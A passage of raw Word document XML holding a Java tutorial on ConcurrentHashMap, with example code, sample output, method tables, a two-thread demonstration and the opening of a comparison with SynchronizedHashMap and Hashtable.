        </w:rPr>
        <w:t xml:space="preserve"> Instead of locking the entire map, it locks only the segment being modified.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A856B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t Reads:</w:t>
      </w:r>
      <w:r w:rsidRPr="004C3969">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Do not require locking, ensuring high performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B71B77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Safe Iteration:</w:t>
      </w:r>
      <w:r w:rsidRPr="004C3969">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Uses </w:t>
      </w:r>
      <w:r w:rsidRPr="004C3969">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fail-safe iterator</w:t>
      </w:r>
      <w:r w:rsidRPr="004C3969">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that reflects the state of the map at the time of iteration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449767C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0B726F3B">
          <v:rect id="_x0000_i6635" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F75358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3. Creating a ConcurrentHashMap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9450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mport java.util.concurrent.ConcurrentHashMap;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE1C02E" w14:textId="77777777" w:rsidR="004C3969" w:rsidRPr="004C3969" w:rsidRDefault="004C3969" w:rsidP="004C3969">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3196719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blic class ConcurrentHashMapExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73906F4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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0709738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Creating a ConcurrentHashMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A0A94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ConcurrentHashMap&lt;String, Integer&gt; map = new ConcurrentHashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8ACFF9" w14:textId="77777777" w:rsidR="004C3969" w:rsidRPr="004C3969" w:rsidRDefault="004C3969" w:rsidP="004C3969">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E5972B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Adding key-value pairs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3893195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Java", 21);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E41162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Python", 30);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FB71F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Scala", 10);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464FF98E" w14:textId="77777777" w:rsidR="004C3969" w:rsidRPr="004C3969" w:rsidRDefault="004C3969" w:rsidP="004C3969">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05259A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Displaying the map</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB23DA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forEach((key, value) -&gt; System.out.println(key + " -&gt; " + value));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F38901" w14:textId="77777777" w:rsidR="004C3969" w:rsidRPr="004C3969" w:rsidRDefault="004C3969" w:rsidP="004C3969">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27DBCFB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Using putIfAbsent() for atomic operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BB9B75"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IfAbsent("Go", 15);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5647AF65" w14:textId="77777777" w:rsidR="004C3969" w:rsidRPr="004C3969" w:rsidRDefault="004C3969" w:rsidP="004C3969">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1720920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Using computeIfAbsent() to calculate value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578E01C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computeIfAbsent("Kotlin", k -&gt; 25);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE84D0B" w14:textId="77777777" w:rsidR="004C3969" w:rsidRPr="004C3969" w:rsidRDefault="004C3969" w:rsidP="004C3969">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53E09FF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 Print updated map</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B64F7F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System.out.println("Updated Map: " + map);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8A35B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203ABB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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0838863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4021D644">
          <v:rect id="_x0000_i6636" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B823FA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4. Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED0C8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Java -&gt; 21  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAF7AF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Python -&gt; 30  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790D926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Scala -&gt; 10  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B63B2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Updated Map: {Java=21, Python=30, Scala=10, Go=15, Kotlin=25}  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2207465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6D25D281">
          <v:rect id="_x0000_i6637" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2354C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lastRenderedPageBreak/>
        <w:t>5. Key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gridCol w:w="5192"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C3969" w:rsidRPr="004C3969" w14:paraId="72283099" w14:textId="77777777" w:rsidTr="004C3969">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4277F47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Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EEB40F8"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651D72F4" w14:textId="77777777" w:rsidTr="004C3969">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0ADD5AD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tIfAbsent(K key, V value)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68F39EB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nserts if the key is not already associated with a value.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C3969" w:rsidRPr="004C3969" w14:paraId="3D3532BC" w14:textId="77777777" w:rsidTr="004C3969">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="35CFE09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computeIfAbsent(K key, Function)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02E8EF6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Computes and inserts if the key is not present.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C3969" w:rsidRPr="004C3969" w14:paraId="4990CE04" w14:textId="77777777" w:rsidTr="004C3969">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CE83A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place(K key, V oldValue, V newValue)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3426A4E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places the value if the old value matches.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C3969" w:rsidRPr="004C3969" w14:paraId="4275DF4F" w14:textId="77777777" w:rsidTr="004C3969">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="533C4DB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move(K key, V value)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4B7E2C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moves the entry if the key maps to the specified value.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C3969" w:rsidRPr="004C3969" w14:paraId="3D8A4EEB" w14:textId="77777777" w:rsidTr="004C3969">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F04BE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forEach()</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33FAF4B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Iterates over key-value pairs (thread-safe iteration).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E0269A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5F099CF7">
          <v:rect id="_x0000_i6638" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D9D300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6. Thread Safety Demonstration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52481AB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ublic class CHMThreadSafety {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3336A63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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529378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ConcurrentHashMap&lt;String, Integer&gt; map = new ConcurrentHashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E901A1C" w14:textId="77777777" w:rsidR="004C3969" w:rsidRPr="004C3969" w:rsidRDefault="004C3969" w:rsidP="004C3969">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="794698F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Runnable writer = () -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2467DC4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for (int i = 0; i &lt; 5; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7A7CD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map.put("Key" + i, i);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59131C6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System.out.println(Thread.currentThread().getName() + " inserted: Key" + i);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D35FB1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2AEE0FA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09DC186C" w14:textId="77777777" w:rsidR="004C3969" w:rsidRPr="004C3969" w:rsidRDefault="004C3969" w:rsidP="004C3969">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BA1A00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hread t1 = new Thread(writer);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628520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hread t2 = new Thread(writer);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2840C20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1.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575FAF8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t2.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDE927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51A665D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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779E4EF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0ED7A48C">
          <v:rect id="_x0000_i6639" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F48FDE1"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7. Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E405C9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0 inserted: Key0  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062D852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1 inserted: Key0  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5A9AF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0 inserted: Key1  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF7AF1F"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Thread-1 inserted: Key1  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22063DB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  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="647A35EC"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Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F73918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ultiple threads insert values concurrently without causing data inconsistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA2A60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01D04928">
          <v:rect id="_x0000_i6640" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC77CE2"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6070"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C3969" w:rsidRPr="004C3969" w14:paraId="5BBD90F0" w14:textId="77777777" w:rsidTr="004C3969">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="590EC1FE"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Advantage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2635099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2C578B8D" w14:textId="77777777" w:rsidTr="004C3969">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="126E320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 Concurrency</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28825DD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Fine-grained locking ensures better throughput.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C3969" w:rsidRPr="004C3969" w14:paraId="3A01003F" w14:textId="77777777" w:rsidTr="004C3969">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="359176C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Thread-Safe Reads</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28860F2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Uses lock-free read operations.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C3969" w:rsidRPr="004C3969" w14:paraId="5FFA35EF" w14:textId="77777777" w:rsidTr="004C3969">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="537354F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Atomic Methods</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A90618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Provides methods like putIfAbsent() for atomic updates.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C3969" w:rsidRPr="004C3969" w14:paraId="0D1E8963" w14:textId="77777777" w:rsidTr="004C3969">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CF3ED0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 Synchronization Overhead</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="54D8681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Uses internal locks for better performance compared to Hashtable.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C3969" w:rsidRPr="004C3969" w14:paraId="3AFAADB4" w14:textId="77777777" w:rsidTr="004C3969">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6789499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Weakly Consistent Iterator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="18D83F2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flects the state at the start, allowing concurrent modifications.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3DE6AEA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2E934326">
          <v:rect id="_x0000_i6641" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C620F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5968"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C3969" w:rsidRPr="004C3969" w14:paraId="79ED93AC" w14:textId="77777777" w:rsidTr="004C3969">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CEB92B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isadvantage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6467B73D"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C3969" w:rsidRPr="004C3969" w14:paraId="0F7DE088" w14:textId="77777777" w:rsidTr="004C3969">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2A4718A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o Null Keys/Values</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0488CF1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Throws NullPointerException if null key or value is used.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C3969" w:rsidRPr="004C3969" w14:paraId="1970BEF9" w14:textId="77777777" w:rsidTr="004C3969">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B1B6AD7"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mplex Internal Mechanism</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="15DEA51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Requires understanding of concurrency concepts (like segments).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C3969" w:rsidRPr="004C3969" w14:paraId="1DB21CC5" w14:textId="77777777" w:rsidTr="004C3969">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="155B18D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nconsistent During Iteration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62D4EDC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ay not reflect updates during iteration due to weak consistency.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="55067D9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6283C473">
          <v:rect id="_x0000_i6642" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="750DFE3F"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0. Differences: ConcurrentHashMap vs SynchronizedHashMap vs Hash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406"/>
        <w:gridCol w:w="2248"/>
        <w:gridCol w:w="3192"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C3969" w:rsidRPr="004C3969" w14:paraId="24255930" w14:textId="77777777" w:rsidTr="004C3969">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34DFADA6"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lastRenderedPageBreak/>
              <w:t>Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04158F6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urrentHashMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A2B0A94"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SynchronizedHashMap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7041B764"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Hashtable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C3969" w:rsidRPr="004C3969" w14:paraId="21BD538B" w14:textId="77777777" w:rsidTr="004C3969">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47DB42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oncurrency Handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="419708A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Lock striping (segment-based locking)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A34C2E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ntire map synchronized</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="352684B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Entire map synchronized</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C3969" w:rsidRPr="004C3969" w14:paraId="22F99CF9" w14:textId="77777777" w:rsidTr="004C3969">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="773ABBC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erformance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2342E20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High, especially with many threads</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57E57EC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oderate, due to global locking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A3CA103"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Low, global locking on each method</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C3969" w:rsidRPr="004C3969" w14:paraId="2CFDDE7A" w14:textId="77777777" w:rsidTr="004C3969">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
